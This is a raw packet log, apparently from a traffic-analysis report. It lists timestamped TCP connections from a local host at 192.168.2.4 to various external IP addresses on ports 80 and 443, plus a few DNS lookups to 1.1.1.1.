                                                                                                                                                Dec 2, 2024 07:56:12.898755074 CET4973480192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:12.903351068 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:12.999541044 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:12.999603033 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:13.018778086 CET804973418.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:13.023282051 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:14.111118078 CET4973580192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:14.230984926 CET804973554.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:14.231080055 CET4973580192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:14.231604099 CET4973580192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:14.231604099 CET4973580192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:14.351703882 CET804973554.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:14.351717949 CET804973554.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:15.276699066 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:15.319591045 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:15.613147020 CET49736443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:15.613190889 CET44349736104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:15.613251925 CET49736443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:15.634061098 CET49736443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:15.634084940 CET44349736104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:15.640903950 CET804973554.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:15.641061068 CET804973554.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:15.641062975 CET4973580192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:15.641104937 CET4973580192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:15.760960102 CET804973554.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:16.223942041 CET4973780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:56:16.343952894 CET804973744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:16.345046997 CET4973780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:56:16.345405102 CET4973780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:56:16.345429897 CET4973780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:56:16.465435028 CET804973744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:16.465528011 CET804973744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:16.849581003 CET44349736104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:16.849662066 CET49736443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:16.876023054 CET49736443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:16.876041889 CET44349736104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:16.876333952 CET44349736104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:16.928981066 CET49736443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:16.990036011 CET49736443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:17.031338930 CET44349736104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:17.491005898 CET804973744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:17.491163015 CET804973744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:17.491220951 CET4973780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:56:17.491255045 CET4973780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:56:17.612051964 CET804973744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:17.666747093 CET44349736104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:17.666806936 CET44349736104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:17.667054892 CET49736443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:17.709606886 CET49736443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:18.002762079 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:18.122740030 CET8049738172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:18.122848034 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:18.137799978 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:18.137904882 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:18.257790089 CET8049738172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:18.257910967 CET8049738172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:19.299092054 CET8049738172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:19.355370998 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:19.717149973 CET4974080192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:56:19.837086916 CET804974072.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:19.837239981 CET4974080192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:56:19.839653015 CET4974080192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:56:19.959533930 CET804974072.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:21.104057074 CET804974072.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:21.147723913 CET4974080192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:56:21.614098072 CET4974280192.168.2.4199.59.243.227
                                                                                                                                                Dec 2, 2024 07:56:21.734291077 CET8049742199.59.243.227192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:21.734389067 CET4974280192.168.2.4199.59.243.227
                                                                                                                                                Dec 2, 2024 07:56:21.940155983 CET4974280192.168.2.4199.59.243.227
                                                                                                                                                Dec 2, 2024 07:56:22.060062885 CET8049742199.59.243.227192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:22.707910061 CET4974480192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:22.827925920 CET804974454.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:22.828021049 CET4974480192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:22.828371048 CET4974480192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:22.828392029 CET4974480192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:22.876645088 CET8049742199.59.243.227192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:22.876770020 CET8049742199.59.243.227192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:22.876822948 CET4974280192.168.2.4199.59.243.227
                                                                                                                                                Dec 2, 2024 07:56:22.948189020 CET804974454.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:22.948250055 CET804974454.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:22.955192089 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:22.955224991 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:23.075032949 CET8049738172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:23.075086117 CET8049738172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:23.303093910 CET8049738172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:23.322401047 CET4974080192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:56:23.350872040 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:23.442538023 CET804974072.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:23.715461016 CET804974072.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:23.757112980 CET4974080192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:56:24.097749949 CET4974480192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:24.211800098 CET804974454.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:24.211805105 CET804974454.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:24.211930037 CET4974480192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:24.211963892 CET4974480192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:24.214426994 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:24.334537983 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:24.334629059 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:24.334875107 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:24.454785109 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:24.958134890 CET4974780192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:25.078062057 CET804974754.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.078141928 CET4974780192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:25.078569889 CET4974780192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:25.078569889 CET4974780192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:25.198487043 CET804974754.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.198498964 CET804974754.244.188.177192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.649142981 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:25.686561108 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.686814070 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.686840057 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.686851978 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.686978102 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.686990023 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.687005997 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.687052965 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.687072992 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.687172890 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.687200069 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.687211990 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.687226057 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.687841892 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.769021988 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.769506931 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:25.769506931 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:25.807101965 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.807120085 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.807372093 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.888117075 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.888247013 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.888681889 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:25.889494896 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.892283916 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:25.944652081 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:56:26.063066959 CET4974780192.168.2.454.244.188.177
                                                                                                                                                Dec 2, 2024 07:56:26.869782925 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:26.989727020 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:26.989809990 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:26.990027905 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:26.990071058 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:27.109927893 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.109951019 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.322065115 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.328289986 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:27.448215008 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.664407015 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.666465044 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:27.666518927 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.666596889 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:27.671411037 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:27.671436071 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:27.710262060 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:56:28.929167032 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:28.929243088 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:28.930699110 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:28.930710077 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:28.930974007 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:28.975876093 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:29.024293900 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:29.067342997 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.092554092 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.092667103 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.092752934 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:29.093065023 CET4975080192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:56:29.212907076 CET804975018.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.382741928 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.382807016 CET44349752104.21.67.152192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:29.382889986 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:29.385936022 CET49752443192.168.2.4104.21.67.152
                                                                                                                                                Dec 2, 2024 07:56:30.392011881 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:30.512145996 CET804975382.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:30.512238979 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:30.512433052 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:30.512454987 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:30.632376909 CET804975382.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:30.632390022 CET804975382.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:32.877676010 CET8049742199.59.243.227192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:32.877739906 CET4974280192.168.2.4199.59.243.227
                                                                                                                                                Dec 2, 2024 07:56:32.877789021 CET4974280192.168.2.4199.59.243.227
                                                                                                                                                Dec 2, 2024 07:56:32.997843027 CET8049742199.59.243.227192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:52.402223110 CET804975382.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:52.402378082 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.402460098 CET4975380192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.488406897 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.522349119 CET804975382.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:52.608361959 CET804975482.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:52.610539913 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.610747099 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.610761881 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:56:52.730778933 CET804975482.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:52.730793953 CET804975482.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:53.298613071 CET8049738172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:53.298697948 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:53.350708008 CET4973880192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:56:53.470678091 CET8049738172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:14.542939901 CET804975482.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:14.543020010 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:14.543082952 CET4975480192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:14.663042068 CET804975482.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:15.927100897 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:16.047086000 CET804979082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:16.047193050 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:16.047380924 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:16.047435045 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:16.167418003 CET804979082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:16.167561054 CET804979082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:20.285212040 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:20.285310984 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:57:28.716624022 CET804974072.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:28.718272924 CET4974080192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:57:28.730606079 CET4974080192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:57:28.850518942 CET804974072.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:32.680295944 CET8049749193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:32.680376053 CET4974980192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:57:38.021214962 CET804979082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:38.022397995 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.102005959 CET4979080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.221996069 CET804979082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:38.257071018 CET4984080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.377114058 CET804984082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:38.377197981 CET4984080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.377584934 CET4984080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.377609968 CET4984080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:38.497494936 CET804984082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:38.497509003 CET804984082.112.184.197192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:52.304486036 CET4984080192.168.2.482.112.184.197
                                                                                                                                                Dec 2, 2024 07:57:52.877566099 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:52.997472048 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:53.000058889 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:53.000236988 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:53.000269890 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:53.120158911 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:53.120177031 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.104959965 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.105030060 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.105107069 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:55.105178118 CET4987280192.168.2.447.129.31.212
                                                                                                                                                Dec 2, 2024 07:57:55.225517988 CET804987247.129.31.212192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.289201975 CET4973380192.168.2.4193.122.130.0
                                                                                                                                                Dec 2, 2024 07:57:55.409321070 CET8049733193.122.130.0192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.684838057 CET4988180192.168.2.413.251.16.150
                                                                                                                                                Dec 2, 2024 07:57:55.804850101 CET804988113.251.16.150192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.804938078 CET4988180192.168.2.413.251.16.150
                                                                                                                                                Dec 2, 2024 07:57:55.805135965 CET4988180192.168.2.413.251.16.150
                                                                                                                                                Dec 2, 2024 07:57:55.805166006 CET4988180192.168.2.413.251.16.150
                                                                                                                                                Dec 2, 2024 07:57:55.925017118 CET804988113.251.16.150192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:55.925039053 CET804988113.251.16.150192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:57.925995111 CET804988113.251.16.150192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:57.926037073 CET804988113.251.16.150192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:57.926100016 CET4988180192.168.2.413.251.16.150
                                                                                                                                                Dec 2, 2024 07:57:57.926208973 CET4988180192.168.2.413.251.16.150
                                                                                                                                                Dec 2, 2024 07:57:58.046080112 CET804988113.251.16.150192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:58.320045948 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:57:58.440351009 CET804974613.248.148.254192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:58.440435886 CET4974680192.168.2.413.248.148.254
                                                                                                                                                Dec 2, 2024 07:57:58.505207062 CET4988780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:57:58.625144958 CET804988744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:58.625227928 CET4988780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:57:58.625430107 CET4988780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:57:58.625452995 CET4988780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:57:58.745342016 CET804988744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:58.745368004 CET804988744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:59.722337008 CET804988744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:59.722394943 CET804988744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:57:59.722455978 CET4988780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:57:59.743032932 CET4988780192.168.2.444.221.84.105
                                                                                                                                                Dec 2, 2024 07:57:59.862934113 CET804988744.221.84.105192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:00.520186901 CET4989380192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:58:00.640244961 CET804989318.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:00.640383005 CET4989380192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:58:00.640574932 CET4989380192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:58:00.640599966 CET4989380192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:58:00.760521889 CET804989318.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:00.760582924 CET804989318.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:02.649509907 CET804989318.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:02.649688005 CET804989318.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:02.649744034 CET4989380192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:58:02.744580030 CET4989380192.168.2.418.141.10.107
                                                                                                                                                Dec 2, 2024 07:58:02.864598989 CET804989318.141.10.107192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:03.357467890 CET4989980192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:58:03.477475882 CET8049899172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:03.477556944 CET4989980192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:58:03.477749109 CET4989980192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:58:03.477765083 CET4989980192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:58:03.597664118 CET8049899172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:03.597678900 CET8049899172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:04.603831053 CET8049899172.234.222.138192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:04.647989988 CET4989980192.168.2.4172.234.222.138
                                                                                                                                                Dec 2, 2024 07:58:04.923933983 CET4990280192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:58:05.044092894 CET804990272.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:05.045030117 CET4990280192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:58:05.045425892 CET4990280192.168.2.472.52.179.174
                                                                                                                                                Dec 2, 2024 07:58:05.165342093 CET804990272.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:06.259377003 CET804990272.52.179.174192.168.2.4
                                                                                                                                                Dec 2, 2024 07:58:06.304225922 CET4990280192.168.2.472.52.179.174

                                                                                                                                                UDP Packets

                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                Dec 2, 2024 07:56:06.732753992 CET5603453192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:07.033504963 CET53560341.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:08.134897947 CET5213453192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:08.274491072 CET53521341.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:08.291016102 CET5895753192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:08.428193092 CET53589571.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:09.709887028 CET6399653192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:09.848270893 CET53639961.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:09.947454929 CET6463853192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:10.518688917 CET53646381.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:12.954268932 CET5318753192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:13.440334082 CET53531871.1.1.1192.168.2.4
                                                                                                                                                Dec 2, 2024 07:56:15.278362989 CET6430753192.168.2.41.1.1.1
                                                                                                                                                Dec 2, 2024 07:56:15.611633062 CET53643071.1.1.1192.168.2.4
